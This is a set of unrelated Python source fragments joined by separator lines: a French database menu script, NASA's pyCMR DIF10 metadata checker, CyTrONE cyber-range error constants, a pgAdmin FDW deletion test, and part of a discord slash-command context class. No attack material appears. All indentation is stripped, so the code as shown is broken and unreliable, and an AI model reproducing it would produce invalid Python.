print("Souhaitez-vous afficher les rΓ©sultats dans la console,")
print("en plus de la crΓ©ation des fichiers HTML ?")
print(" (O Oui / N Non)")
choix = input()
if (choix[0].lower() == "o"):
bconsole = True
# Menu principal
while True:
menu()
print("Chosissez un numΓ©ro de question pour avoir la rΓ©ponse :")
choix = input()
if (choix == "1"):
listeRegions()
elif (choix == "2"):
listeDepartement()
elif (choix == "3"):
choixRegions()
elif (choix == "4"):
choix_departement_theme()
elif (choix == "5"):
typeEnergie()
elif (choix == "6"):
tonnes()
elif (choix == "7"):
topFive()
elif (choix == "8"):
weak()
elif (choix == "9"):
bestPopMin()
elif (choix == "10"):
pauvrete()
elif (choix == "11"):
poids_eco()
elif (choix == "0"):
break
else:
print ("Choix invalide")
# fermeture "propre" du curseur et de la connection
cur.close()
connection.close()
|
'''
Copyright 2016, United States Government, as represented by the Administrator of
the National Aeronautics and Space Administration. All rights reserved.
The "pyCMR" platform is licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License. You may obtain a
copy of the License at http://www.apache.org/licenses/LICENSE-2.0.
Unless required by applicable law or agreed to in writing, software distributed under
the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
ANY KIND, either express or implied. See the License for the specific language
governing permissions and limitations under the License.
'''
#import sys
import os, errno
import json
import CollectionCheckerDIF
#import GranuleChecker
from cmr import searchCollection
#from cmr import searchGranule
from xml.etree import ElementTree
from xmlParser import XmlDictConfigDIF
from xmlParser import XmlDictConfig
collection_output_header = 'DIF10 Collection Elements,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,\n\
"* = GCMD controlled: http://gcmd.nasa.gov/learn/keyword_list.html\nThese datasets were reviewed in comparison to GCMD Keyword Version: 8.4.1",\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,\n\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,Platform\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,Spatial_Coverage\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,Organization\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,\n\
,,,,,,,,,,,,,,,,,,,,,,Personnel\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,Platform/ Instrument\
,,,,,,,,,,,,,,Platform/ Instrument/ Sensor\
,,,,,,,,,,,,"Temporal_Coverage (Must include a choice of 1, 2, 3 or 4)"\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Spatial_Coverage/ Geometry (must have a choice of (1), (2), (3) or (4))"\
,,,,,,,,,,,Spatial_Coverage/ Spatial_Info\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,Organization/ Personnel\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\
,,,,,,,,,,\n\
,,,,,Dataset_Citation,,,,,,,,,,,,,,,Personnel/ Contact_Person,,,,,,,,,,,Personnel/ Contact_Group,,,,,,,,,Science_Keywords,,,,,,,,,,,,Platform/ Characteristics,,,,,,,,,Platform/ Instrument/ Characteristics,,,,,,,,\
Platform/ Instrument/ Sensor/ Characteristics,,,,,,,,,,,Temporal_Coverage/ Range_DateTime (1),,,Temporal_Coverage/ Periodic_DateTime (3),,,,,,,Temporal_Coverage/ Paleo_DateTime (4),,,,,,,,,,,,,,Spatial_Coverage/ Geometry/ Bounding_Rectangle (1),,,,,,,,,,Spatial_Coverage/ Geometry/ Point (2),,Spatial_Coverage/ Geometry/ Line (3),,,,Spatial_Coverage/ Geometry/ Polygon (4),,,,Spatial_Coverage/ Orbit_Parameters,,,,,Spatial_Coverage/ Vertical_Spatial_Info,,,Spatial_Coverage/ Spatial_Info/ Horizontal_Coordinate_System/ Geodetic_Model,,,,Spatial_Coverage/ Spatial_Info/ Horizontal_Coordinate_System/ Geographic_Coordinate_System,,,Spatial_Coverage/ Spatial_Info/ Horizontal_Coordinate_System/ Local_Coordinate_System,,Spatial_Coverage/ Spatial_Info/ TwoD_Coordinate_System,,,,,Location,,,,,,Data_Resolution,,,,,,,Project,,,,,,,,,,,,,,,,,,Organization/ Personnel/ Contact_Person ,,,,,,,,,,,Organization/ Personnel/ Contact_Group,,,,,,,,,Distribution ,,,,Multimedia_Sample,,,,,Reference,,,,,,,,,,,,,,,,,Summary ,,Related_URL ,,,,,,,Metadata_Association,,,,Additional_Attributes,,,,,,,,,,,,,,,,,Metadata_Dates,,,,,,,,,Extended_Metadata,,,,,,,,,,,,,,,\n\
Dataset Id (short name) - umm-json link,Entry_ID/ Short_Name,Entry_ID/ Version,Version_Description,Entry_Title,Dataset_Citation/ Dataset_Creator,Dataset_Citation/ Dataset_Editor,Dataset_Citation/ Dataset_Title,Dataset_Citation/ Dataset_Series_Name,Dataset_Citation/ Dataset_Release_Date,Dataset_Citation/ Dataset_Release_Place,Dataset_Citation/ Dataset_Publisher,Dataset_Citation/ Version,Dataset_Citation/ Issue_Identification,Dataset_Citation/ Data_Presentation_Form,Dataset_Citation/ Other_Citation_Details,* where type must = \"DOI\" Dataset_Citation/ Persistent_Identifier/ Type,* DOI should be entered here Dataset_Citation/ Persistent_Identifier/ Identifier,Dataset_Citation/ Online_Resource,Personnel/ Role ,Personnel/ Contact_Person/ First_Name,Personnel/ Contact_Person/ Middle_Name,Personnel/ Contact_Person/ Last_Name,Personnel/ Contact_Person/ Address/ Street_Address,Personnel/ Contact_Person/ Address/ City,Personnel/ Contact_Person/ Address/ State_Province,Personnel/ Contact_Person/ Address/ Postal_Code,Personnel/ Contact_Person/ Address/ Country,Personnel/ Contact_Person/ Email,Personnel/ Contact_Person/ Phone/ Number,Personnel/ Contact_Person/ Phone/ Type ,Personnel/ Contact_Group/ Name,Personnel/ Contact_Group/ Address/ Street_Address,Personnel/ Contact_Group/ Address/ City,Personnel/ Contact_Group/ Address/ State_Province,Personnel/ Contact_Group/ Address/ Postal_Code,Personnel/ Contact_Group/ Address/ Country,Personnel/ Contact_Group/ Email,Personnel/ Contact_Group/ Phone/ Number,Personnel/ Contact_Group/ Phone/ Type,Science_Keywords/ Category *,Science_Keywords/ Topic *,Science_Keywords/ Term *,Science_Keywords/ Variable_Level_1 *,Science_Keywords/ Variable_Level_1/ Variable_Level_2 *,Science_Keywords/ Variable_Level_1/ Variable_Level_2/ Variable_Level_3 *,Science_Keywords/ Variable_Level_1/ Variable_Level_2/ Variable_Level_3/ Detailed_Variable,ISO_Topic_Category,Ancillary_Keyword,Platform/ Type *,Platform/ Short_Name *,Platform/ Long_Name*,Platform/ Characteristics/ Name ,Platform/ Characteristics/ Description,Platform/ Characteristics/ DataType,Platform/ Characteristics/ Unit,Platform/ Characteristics/ Value,Platform/ Instrument/ Short_Name *,Platform/ Instrument/ Long_Name *,Platform/ Instrument/ Technique,Platform/ Instrument/ NumberOfSensors,Platform/ Instrument/ Characteristics/ Name,Platform/ Instrument/ Characteristics/ Description,Platform/ Instrument/ Characteristics/ DataType,Platform/ Instrument/ Characteristics/ Unit ,Platform/ Instrument/ Characteristics/ Value,Platform/ Instrument/ OperationalMode,Platform/ Instrument/ Sensor/ Short_Name *,Platform/ Instrument/ Sensor/ Long_Name *,Platform/ Instrument/ Sensor/ Technique,Platform/ Instrument/ Sensor/ Characteristics/ Name ,Platform/ Instrument/ Sensor/ Characteristics/ Description ,Platform/ Instrument/ Sensor/ Characteristics/ DataType ,Platform/ Instrument/ Sensor/ Characteristics/ Unit ,Platform/ Instrument/ Sensor/ Characteristics/ Value ,Temporal_Coverage/ Time_Type,Temporal_Coverage/ Date_Type,Temporal_Coverage/ Temporal_Range_Type,Temporal_Coverage/ Precision_Of_Seconds,Temporal_Coverage/ Ends_At_Present_Flag,Temporal_Coverage/ Range_DateTime/ Beginning_Date_Time ,Temporal_Coverage/ Range_DateTime/ Ending_Date_Time ,Temporal_Coverage/ Single_Date_Time (2),Temporal_Coverage/ Periodic_DateTime/ Name,Temporal_Coverage/ Periodic_DateTime/ Start_Date,Temporal_Coverage/ Periodic_DateTime/ End_Date,Temporal_Coverage/ Periodic_DateTime/ Duration_Unit,Temporal_Coverage/ Periodic_DateTime/ Duration_Value,Temporal_Coverage/ Periodic_DateTime/ Period_Cycle_Duration_Unit,Temporal_Coverage/ Periodic_DateTime/ Period_Cycle_Duration_Value,Temporal_Coverage/ Paleo_DateTime/ Paleo_Start_Date,Temporal_Coverage/ Paleo_DateTime/ Paleo_Stop_Date,Temporal_Coverage/ Paleo_DateTime/ Chronostratigraphic_Unit/ Eon,Temporal_Coverage/ Paleo_DateTime/ Chronostratigraphic_Unit/ Era,Temporal_Coverage/ Paleo_DateTime/ Chronostratigraphic_Unit/ Period,Temporal_Coverage/ Paleo_DateTime/ Chronostratigraphic_Unit/ Epoch,Temporal_Coverage/ Paleo_DateTime/ Chronostratigraphic_Unit/ Stage,Temporal_Coverage/ Paleo_DateTime/ Chronostratigraphic_Unit/ Detailed_Classification ,Temporal_Coverage/ Temporal_Info/ Ancillary_Temporal_Keyword ,DataSet_Progress,Spatial_Coverage/ Spatial_Coverage_Type,Spatial_Coverage/ Granule_Spatial_Representation,Spatial_Coverage/ Zone_Identifier,Spatial_Coverage/ Geometry/ Coordinate_System ,Spatial_Coverage/ Geometry/ Bounding_Rectangle/ Southernmost_Latitude,Spatial_Coverage/ Geometry/ Bounding_Rectangle/ Northernmost_Latitude,Spatial_Coverage/ Geometry/ Bounding_Rectangle/ Westernmost_Longitude,Spatial_Coverage/ Geometry/ Bounding_Rectangle/ Easternmost_Longitude,Spatial_Coverage/ Geometry/ Bounding_Rectangle/ Minimum_Altitude,Spatial_Coverage/ Geometry/ Bounding_Rectangle/ Maximum_Altitude,Spatial_Coverage/ Geometry/ Bounding_Rectangle/ Altitude_Unit,Spatial_Coverage/ Geometry/ Bounding_Rectangle/ Minimum_Depth,Spatial_Coverage/ Geometry/ Bounding_Rectangle/ Maximum_Depth,Spatial_Coverage/ Geometry/ Bounding_Rectangle/ Depth_Unit,Spatial_Coverage/ Geometry/ Point/ Point_Longitude,Spatial_Coverage/ Geometry/ Point/ Point_Latitude,Spatial_Coverage/ Geometry/ Line/ Point/ Point_Longitude,Spatial_Coverage/ Geometry/ Line/ Point/ Point_Latitude,Spatial_Coverage/ Geometry/ Line/ Center_Point/ Point_Latitude,Spatial_Coverage/ Geometry/ Line/ Center_Point/ Point_Latitude,Spatial_Coverage/ Geometry/ Polygon/ Boundary/ Point/ Point_Longitude,Spatial_Coverage/ Geometry/ Polygon/ Boundary/ Point/ Point_Latitude,Spatial_Coverage/ Geometry/ Polygon/ Exclusion_Zone/ Boundary/ Point/ Point_Longitude,Spatial_Coverage/ Geometry/ Polygon/ Exclusion_Zone/ Boundary/ Point/ Point_Latitude,Spatial_Coverage/ Orbit_Parameters/ Swath_Width,Spatial_Coverage/ Orbit_Parameters/ Period,Spatial_Coverage/ Orbit_Parameters/ Inclination_Angle,Spatial_Coverage/ Orbit_Parameters/ Number_of_Orbits,Spatial_Coverage/ Orbit_Parameters/ Start_Circular_Latitude,Spatial_Coverage/ Vertical_Spatial_Info/ Type,Spatial_Coverage/ Vertical_Spatial_Info/ Value,Spatial_Coverage/ Spatial_Info/ Spatial_Coverage_Type,Spatial_Coverage/ Spatial_Info/ Horizontal_Coordinate_System/ Geodetic_Model/ Horizontal_DatumName,Spatial_Coverage/ Spatial_Info/ Horizontal_Coordinate_System/ Geodetic_Model/ Ellipsoid_Name,Spatial_Coverage/ Spatial_Info/ Horizontal_Coordinate_System/ Geodetic_Model/ Semi_Major_Axis,Spatial_Coverage/ Spatial_Info/ Horizontal_Coordinate_System/ Geodetic_Model/ Denominator_Of_Flattening_Ratio,Spatial_Coverage/ Spatial_Info/ Horizontal_Coordinate_System/ Geographic_Coordinate_System/ GeographicCoordinateUnits,Spatial_Coverage/ Spatial_Info/ Horizontal_Coordinate_System/ Geographic_Coordinate_System/ LatitudeResolution,Spatial_Coverage/ Spatial_Info/ Horizontal_Coordinate_System/ Geographic_Coordinate_System/ LongitudeResolution,Spatial_Coverage/ Spatial_Info/ Horizontal_Coordinate_System/ Local_Coordinate_System/ Description,Spatial_Coverage/ Spatial_Info/ Horizontal_Coordinate_System/ Local_Coordinate_System/ GeoReferenceInformation,Spatial_Coverage/ Spatial_Info/ TwoD_Coordinate_System/ TwoD_Coordinate_System_Name,Spatial_Coverage/ Spatial_Info/ TwoD_Coordinate_System/ Coordinate1/ Minimum_Value ,Spatial_Coverage/ Spatial_Info/ TwoD_Coordinate_System/ Coordinate1/ Maximum_Value,Spatial_Coverage/ Spatial_Info/ TwoD_Coordinate_System/ Coordinate2/ Minimum_Value,Spatial_Coverage/ Spatial_Info/ TwoD_Coordinate_System/ Coordinate2/ Maximum_Value,Location/ Location_Category *,Location/ Location_Type *,Location/ Location_Subregion1 *,Location/ Location_Subregion2 *,Location/ Location_Subregion3 *,Location/ Detailed_Location,Data_Resolution/ Latitude_Resolution,Data_Resolution/ Longitude_Resolution,Data_Resolution/ Horizontal_Resolution_Range,Data_Resolution/ Vertical_Resolution,Data_Resolution/ Vertical_Resolution_Range,Data_Resolution/ Temporal_Resolution,Data_Resolution/ Temporal_Resolution_Range,Project/ Short_Name *,Project/ Long_Name *,Project/ Campaign,Project/ Start_Date,Project/ End_Date,Quality,Access_Constraints,Use_Constraints,DataSet_Language,Originating_Center,Organization/ Organization_Type,Organization/ Organization_Name/ Short_Name *,Organization/ Organization_Name/ Long_Name *,Organization/ Hours_Of_Service,Organization/Instructions,Organization/Organization_URL,Organization/Data_Set_ID,Organization/ Personnel/ Role ,Organization/ Personnel/ Contact_Person/ First_Name,Organization/ Personnel/ Contact_Person/ Middle_Name,Organization/ Personnel/ Contact_Person/ Last_Name,Organization/ Personnel/ Contact_Person/ Address/ Street_Address,Organization/ Personnel/ Contact_Person/ Address/ City,Organization/ Personnel/ Contact_Person/ Address/ State_Province,Organization/ Personnel/ Contact_Person/ Address/ Postal_Code,Organization/ Personnel/ Contact_Person/ Address/ Country,Organization/ Personnel/ Contact_Person/ Email,Organization/ Personnel/ Contact_Person/ Phone/ Number,Organization/ Personnel/ Contact_Person/ Phone/ Type ,Organization/ Personnel/ Contact_Group/ Name,Organization/ Personnel/ Contact_Group/ Address/ Street_Address,Organization/ Personnel/ Contact_Group/ Address/ City,Organization/ Personnel/ Contact_Group/ Address/ State_Province,Organization/ Personnel/ Contact_Group/ Address/ Postal_Code,Organization/ Personnel/ Contact_Group/ Address/ Country,Organization/ Personnel/ Contact_Group/ Email,Organization/ Personnel/ Contact_Group/ Phone/ Number,Organization/ Personnel/ Contact_Group/ Phone/ Type,Distribution/ Distribution_Media,Distribution/ Distribution_Size,Distribution/ Distribution_Format,Distribution/ Fees,Multimedia_Sample/ File,Multimedia_Sample/ URL,Multimedia_Sample/Format,Multimedia_Sample/Caption,Multimedia_Sample/Description,Reference/ Citation,Reference/ Author,Reference/ Publication Date,Reference/ Title,Reference/ Series,Reference/ Edition,Reference/ Volume,Reference/ Issue,Reference/\
Report_Number,Reference/Publication_Place,Reference/ Publisher,Reference/ Pages,Reference/ ISBN,Reference/Persistent_Identifier/ Type,Reference/Persistent_Identifier/ Identifier,Reference/Online_Resource,Reference/Other_Reference_Details,Summary/ Abstract,Summary/ Purpose,Related_URL/ URL_Content_Type/ Type *,Related_URL/ URL_Content_Type/ Subtype *,Related_URL/ Protocol,Related_URL/ URL,Related_URL/ Title,Related_URL/ Description,Related_URL/ Mime_Type,Metadata_Association/ Entry_Id,Metadata_Association/ Type,Metadata_Association/ Description,IDN_Node/ Short_Name,Additional_Attributes/ Name,Additional_Attributes/ DataType,Additional_Attributes/ Description,Additional_Attributes/ MeasurementResolution,Additional_Attributes/ ParameterRangeBegin,Additional_Attributes/ ParameterRangeEnd,Additional_Attributes/ ParameterUnitsOfMeasure,Additional_Attributes/ ParameterValueAccuracy,Additional_Attributes/ ValueAccuracyExplanation,Additional_Attributes/ Value,Product_Level_ID,Product_Flag,Collection_Data_Type,Originating_Metadata_Node,Metadata_Name,Metadata_Version,DIF_Revision_History,Metadata_Dates/ Metadata_Creation,Metadata_Dates/ Metadata_Last_Revision,Metadata_Dates/ Metadata_Future_Review,Metadata_Dates/ Metadata_Delete,Metadata_Dates/ Data_Creation,Metadata_Dates/ Data_Last_Revision,Metadata_Dates/ Data_Future_Review,Metadata_Dates/ Data_Delete,Private,Extended_Metadata/ Metadata/ Group,Extended_Metadata/ Metadata/ Name,Extended_Metadata/ Metadata/ Description,Extended_Metadata/ Metadata/ Type,Extended_Metadata/ Metadata/ Update_Date,Extended_Metadata/ Value,Checked by:,Comments:,# Red fields (absolute errors):,# Yellow fields (recommended fixes),# Green fields (observations/ may or may not need to be fixed),# np fields (not in the metadata, and not marked by any color),# fields checked (265 - #np fields),% red fields,% yellow fields,% green fields\n'
def silentremove(filename):
try:
os.remove(filename)
except OSError as e: # this would be "except OSError, e:" before Python 2.6
if e.errno != errno.ENOENT: # errno.ENOENT = no such file or directory
raise # re-raise exception if a different error occured
def replace_file(filename):
f = open(filename)
lines = f.readlines()
f.close()
length = len(lines)
for i in range(length):
if(lines[i][0:4] == "<DIF"):
#print lines[i]
lines[i] = '<DIF>\n'
f = open(filename, 'w')
for l in lines:
f.write(l)
f.close()
def doCollectionCheckwithRecordsDIF(filename, outputform = 'CSV', outfilename = "result.csv"):
replace_file(filename)
xml = ElementTree.parse(filename)
root_element = xml.getroot()
ck = CollectionCheckerDIF.Checker()
if (outputform == 'JSON'):
for collection in root_element.iter('DIF'):
metadata = XmlDictConfigDIF(collection)
return ck.checkAllJSON(metadata)
else:
out_fp = open(outfilename, 'w')
out_fp.write(collection_output_header)
for collection in root_element.iter('DIF'):
metadata = XmlDictConfigDIF(collection)
result = ck.checkAll(metadata)
out_fp.write(filename+ ", " +result + "\n")
out_fp.close()
def doCollectionCheckwithShortNameListDIF(filename, outfilename = "result.csv", tmp_path = "./"):
in_fp = open(filename, 'r')
out_fp = open(outfilename, 'w')
out_fp.write(collection_output_header)
ck = CollectionCheckerDIF.Checker()
for line in iter(in_fp.readline, b''):
shortName = line.rstrip()
if len(shortName) != 0:
#print shortName
result = searchCollection(limit=100, short_name=shortName)
result[0].download(tmp_path);
fileNameTemp = tmp_path+shortName.replace('/', '')
replace_file(fileNameTemp)
xml = ElementTree.parse(fileNameTemp)
root_element = xml.getroot()
for collection in root_element.iter('DIF'):
metadata = XmlDictConfigDIF(collection)
result = ck.checkAll(metadata)
out_fp.write(shortName+ ", " + result + '\n')
silentremove(tmp_path+shortName.replace('/', ''))
in_fp.close()
out_fp.close()
|
#############################################################################
# Classes related to the CyTrONE storyboard
#############################################################################
class Storyboard:
# Global configuration flags
ENABLE_HTTPS = True
ENABLE_PASSWORD = True
# Separator constants
SEPARATOR1 = "-------------------------------------------------------------------------"
SEPARATOR2 = "========================================================================="
SEPARATOR3 = "#########################################################################"
# Server status keys
SERVER_STATUS_KEY = "status"
SERVER_STATUS_SUCCESS = "SUCCESS"
SERVER_STATUS_ERROR = "ERROR"
SERVER_ACTIVITY_ID_KEY = "activity_id"
SERVER_MESSAGE_KEY = "message"
# Server status messages
USER_SETTINGS_LOADING_ERROR = "Server could not load the user information database"
USER_ID_MISSING_ERROR = "User id is missing"
USER_ID_INVALID_ERROR = "User id is invalid"
USER_PASSWORD_MISSING_ERROR = "User password is missing"
USER_PASSWORD_NOT_IN_DATABASE_ERROR = "User password not in database"
USER_ID_PASSWORD_INVALID_ERROR = "User id and/or password are invalid"
ACTION_MISSING_ERROR = "Action is missing"
ACTION_INVALID_ERROR = "Action is invalid"
LANGUAGE_MISSING_ERROR = "Language is missing"
LANGUAGE_INVALID_ERROR = "Language is invalid"
TRAINING_SETTINGS_LOADING_ERROR = "Server could not load the training settings database"
INSTANCE_COUNT_MISSING_ERROR = "Instance count is missing"
INSTANCE_COUNT_INVALID_ERROR = "Instance count is invalid"
TRAINING_TYPE_MISSING_ERROR = "Training type is invalid or missing"
SCENARIO_NAME_MISSING_ERROR = "Scenario name is missing"
LEVEL_NAME_MISSING_ERROR = "Level name is missing"
SESSION_ALLOCATION_ERROR = "Server could not allocate a new session (maximum number reached)"
CONTENT_IDENTIFICATION_ERROR = "Server could not determine the training content for the specified scenario and level"
CONTENT_LOADING_ERROR = "Server could not load the training content"
CONTENT_UPLOAD_ERROR = "LMS content manager could not upload the training content"
CONTENT_REMOVAL_ERROR = "LMS content manager could not remove the training activity"
CONTENT_SERVER_ERROR = "Server could not communicate with the LMS content manager"
TEMPLATE_IDENTIFICATION_ERROR = "Server could not determine the cyber range template for the specified scenario and level"
TEMPLATE_LOADING_ERROR = "Server could not load the cyber range template"
INSTANTIATION_SERVER_ERROR = "Server could not communicate with the cyber range manager"
INSTANTIATION_ERROR = "Cyber range manager could not instantiate the cyber range"
INSTANTIATION_STATUS_FILE_NOT_FOUND = "Instantiation status file could not be found"
INSTANTIATION_CYRIS_IO_ERROR = "CyRIS execution I/O error"
INSTANTIATION_SIMULATED_ERROR = "Simulated range instantiation error"
DESTRUCTION_ERROR = "Cyber range manager could not destroy the cyber range"
DESTRUCTION_SIMULATED_ERROR = "Simulated range destruction error"
DESTRUCTION_SCRIPT_NOT_FOUND = "Destruction script could not be found"
SESSION_ID_MISSING_ERROR = "Session id is missing"
SESSION_ID_INVALID_ERROR = "Session id is invalid"
SESSION_INFO_CONSISTENCY_ERROR = "Server encountered a session information consistency issue"
|
##########################################################################
#
# pgAdmin 4 - PostgreSQL Tools
#
# Copyright (C) 2013 - 2020, The pgAdmin Development Team
# This software is released under the PostgreSQL Licence
#
##########################################################################
from __future__ import print_function
import uuid
import json
from pgadmin.browser.server_groups.servers.databases.tests import \
utils as database_utils
from pgadmin.utils.route import BaseTestGenerator
from regression import parent_node_dict
from regression.python_test_utils import test_utils as utils
from . import utils as fdw_utils
class FDWDDeleteMultipleTestCase(BaseTestGenerator):
"""This class will delete foreign data wrappers under test database."""
skip_on_database = ['gpdb']
scenarios = [ # Fetching default URL for foreign_data_wrapper node.
('Check FDW Node',
dict(url='/browser/foreign_data_wrapper/obj/'))]
def setUp(self):
""" This function will create extension and foreign data wrapper."""
super(FDWDDeleteMultipleTestCase, self).setUp()
self.schema_data = parent_node_dict['schema'][-1]
self.server_id = self.schema_data['server_id']
self.db_id = self.schema_data['db_id']
self.db_name = parent_node_dict["database"][-1]["db_name"]
self.schema_name = self.schema_data['schema_name']
self.fdw_names = ["fdw_{0}".format(str(uuid.uuid4())[1:8]),
"fdw_{0}".format(str(uuid.uuid4())[1:8])]
self.fdw_ids = [fdw_utils.create_fdw(self.server, self.db_name,
self.fdw_names[0]),
fdw_utils.create_fdw(self.server, self.db_name,
self.fdw_names[1])]
def runTest(self):
"""This function will fetch foreign data wrapper present under test
database."""
db_con = database_utils.connect_database(self,
utils.SERVER_GROUP,
self.server_id,
self.db_id)
if not db_con["info"] == "Database connected.":
raise Exception("Could not connect to database.")
fdw_response = fdw_utils.verify_fdw(self.server, self.db_name,
self.fdw_names[0])
if not fdw_response:
raise Exception("Could not find FDW.")
fdw_response = fdw_utils.verify_fdw(self.server, self.db_name,
self.fdw_names[1])
if not fdw_response:
raise Exception("Could not find FDW.")
data = {'ids': self.fdw_ids}
delete_response = self.tester.delete(self.url +
str(utils.SERVER_GROUP) +
'/' + str(self.server_id) + '/' +
str(self.db_id) + '/',
follow_redirects=True,
data=json.dumps(data),
content_type='html/json')
self.assertEquals(delete_response.status_code, 200)
def tearDown(self):
"""This function disconnect the test database and drop added extension
and dependant objects."""
database_utils.disconnect_database(self, self.server_id,
self.db_id)
|
import datetime
import typing
from typing import TYPE_CHECKING
from warnings import warn
import discord
from discord.ext import commands
from discord.utils import snowflake_time
from . import error, http, model
from .dpy_overrides import ComponentMessage
if TYPE_CHECKING: # circular import sucks for typehinting
from . import client
class InteractionContext:
"""
Base context for interactions.\n
In some ways similar with discord.ext.commands.Context.
.. warning::
Do not manually init this model.
:ivar message: Message that invoked the slash command.
:ivar interaction_id: Interaction ID of the command message.
:ivar bot: discord.py client.
:ivar _http: :class:`.http.SlashCommandRequest` of the client.
:ivar _logger: Logger instance.
:ivar data: The raw data of the interaction.
:ivar values: The values sent with the interaction. Currently for selects.
:ivar deferred: Whether the command is current deferred (loading state)
:ivar _deferred_hidden: Internal var to check that state stays the same
:ivar responded: Whether you have responded with a message to the interaction.
:ivar guild_id: Guild ID of the command message. If the command was invoked in DM, then it is ``None``
:ivar author_id: User ID representing author of the command message.
:ivar channel_id: Channel ID representing channel of the command message.
:ivar author: User or Member instance of the command invoke.
"""
def __init__(
self,
_http: http.SlashCommandRequest,
_json: dict,
_discord: typing.Union[discord.Client, commands.Bot],
logger,
):
self._token = _json["token"]
self.message = None
self.menu_messages = None
self.data = _json["data"]
self.interaction_id = _json["id"]
self._http = _http
self.bot = _discord
self._logger = logger
self.deferred = False
self.responded = False
self.values = _json["data"]["values"] if "values" in _json["data"] else None
self._deferred_hidden = False # To check if the patch to the deferred response matches
self.guild_id = int(_json["guild_id"]) if "guild_id" in _json.keys() else None
self.author_id = int(
_json["member"]["user"]["id"] if "member" in _json.keys() else _json["user"]["id"]
)
self.channel_id = int(_json["channel_id"])
if self.guild:
self.author = discord.Member(
data=_json["member"], state=self.bot._connection, guild=self.guild
)
elif self.guild_id:
self.author = discord.User(data=_json["member"]["user"], state=self.bot._connection)
else:
self.author = discord.User(data=_json["user"], state=self.bot._connection)
self.created_at: datetime.datetime = snowflake_time(int(self.interaction_id))
@property
def _deffered_hidden(self):
warn(
"`_deffered_hidden` as been renamed to `_deferred_hidden`.",
DeprecationWarning,
stacklevel=2,
)
return self._deferred_hidden
@_deffered_hidden.setter
def _deffered_hidden(self, value):
warn(
"`_deffered_hidden` as been renamed to `_deferred_hidden`.",
DeprecationWarning,
stacklevel=2,
)
self._deferred_hidden = value
@property
def deffered(self):
warn("`deffered` as been renamed to `deferred`.", DeprecationWarning, stacklevel=2)
return self.deferred
@deffered.setter
def deffered(self, value):
warn("`deffered` as been renamed to `deferred`.", DeprecationWarning, stacklevel=2)
self.deferred = value
@property
def guild(self) -> typing.Optional[discord.Guild]:
"""
Guild instance of the command invoke. If the command was invoked in DM, then it is ``None``
:return: Optional[discord.Guild]
"""
return self.bot.get_guild(self.guild_id) if self.guild_id else None
@property
def channel(self) -> typing.Optional[typing.Union[discord.TextChannel, discord.DMChannel]]:
"""
Channel instance of the command invoke.
:return: Optional[Union[discord.abc.GuildChannel, discord.abc.PrivateChannel]]
"""
return self.bot.get_channel(self.channel_id)
@property
def voice_client(self) -> typing.Optional[discord.VoiceProtocol]:
"""
VoiceClient instance of the command invoke. If the command was invoked in DM, then it is ``None``.
If the bot is not connected to any Voice/Stage channels, then it is ``None``.
:return: Optional[discord.VoiceProtocol]
"""
return self.guild.voice_client if self.guild else None
@property
def me(self) -> typing.Union[discord.Member, discord.ClientUser]:
"""
Bot member instance of the command invoke. If the command was invoked in DM, then it is ``discord.ClientUser``.
:return: Union[discord.Member, discord.ClientUser]
"""
return self.guild.me if self.guild is not None else self.bot.user
async def defer(self, hidden: bool = False):
"""
'Defers' the response, showing a loading state to the user
:param hidden: Whether the deferred response should be ephemeral . Default ``False``.
"""
if self.deferred or self.responded:
raise error.AlreadyResponded("You have already responded to this command!")
base = {"type": 5}
if hidden:
base["data"] = {"flags": 64}
self._deferred_hidden = True
await self._http.post_initial_response(base, self.interaction_id, self._token)
self.deferred = True
async def send(
self,
content: str = "",
*,
embed: discord.Embed = None,
embeds: typing.List[discord.Embed] = None,
tts: bool = False,
file: discord.File = None,
files: typing.List[discord.File] = None,
allowed_mentions: discord.AllowedMentions = None,
hidden: bool = False,
delete_after: float = None,
components: typing.List[dict] = None,
) -> model.SlashMessage:
"""
Sends response of the interaction.
.. warning::
- Since Release 1.0.9, this is completely changed. If you are migrating from older version, please make sure to fix the usage.
- You can't use both ``embed`` and ``embeds`` at the same time, also applies to ``file`` and ``files``.
- If you send files in the initial response, this will defer if it's not been deferred, and then PATCH with the message
:param content: Content of the response.
:type content: str
:param embed: Embed of the response.
:type embed: discord.Embed
:param embeds: Embeds of the response. Maximum 10.
